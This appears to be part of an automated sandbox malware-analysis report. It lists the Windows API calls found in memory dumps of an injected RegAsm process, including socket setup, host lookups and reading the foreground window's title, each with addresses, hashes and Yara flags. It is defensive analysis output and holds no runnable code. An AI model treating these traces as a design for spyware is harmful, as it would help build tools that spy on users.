                                                                                                                            • API String ID: 2742660187-671089009
                                                                                                                            • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                            • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                            • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                            • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                            APIs
                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: try_get_function
                                                                                                                            • String ID: FlsAlloc
                                                                                                                            • API String ID: 2742660187-671089009
                                                                                                                            • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                                                                            • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                                                                                            • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                                                                            • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                                                                                            APIs
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1890195054-2766056989
                                                                                                                            • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                            • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                            • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                            • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                            • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 546120528-0
                                                                                                                            • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                            • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                            • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                            • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                                                                                            • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 546120528-0
                                                                                                                            • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                                                                            • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                                                                                            • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                                                                            • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                              • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                              • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                              • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                              • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                              • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                            • _free.LIBCMT ref: 10006CD7
                                                                                                                            • _free.LIBCMT ref: 10006D0D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2991157371-0
                                                                                                                            • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                            • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                            • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                            • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                              • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                                                                                              • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                                                                                              • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                                                            • _free.LIBCMT ref: 0044EFD0
                                                                                                                            • _free.LIBCMT ref: 0044F006
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2991157371-0
                                                                                                                            • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                                                                                            • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                                                                                            • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                                                                                            • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2279764990-0
                                                                                                                            • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                                                                            • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                                                                                            • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                                                                            • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                              • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1953588214-0
                                                                                                                            • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                            • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                                                                            • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                            • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                            APIs
                                                                                                                            • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                            • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3750050125-0
                                                                                                                            • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                            • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                            • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                            • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                            • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                                                                            • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                            • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ForegroundText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 29597999-0
                                                                                                                            • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                                                                            • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                                                                            • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                                                                            • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                                                                            APIs
                                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                                                                                              • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                                                                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                                                                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                                                                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                                                                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                                                                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                                                                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                                                                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1170566393-0
                                                                                                                            • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                                                                            • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                                                                                            • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                                                                            • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 806969131-0
                                                                                                                            • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                            • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                            • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                            • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 806969131-0
                                                                                                                            • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                                                                            • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                                                                                                            • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                                                                            • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                                                                                                            APIs
                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __crt_fast_encode_pointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3768137683-0
                                                                                                                            • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                            • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                            • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                            • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                            • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                                                                            • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                            • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __alldvrm
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 65215352-0
                                                                                                                            • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                                                                            • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                                                                                                            • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                                                                            • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                            • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                                                                            • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                            • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Startup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 724789610-0
                                                                                                                            • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                                            • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                                                                            • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                                            • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                                                                            APIs
                                                                                                                            • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
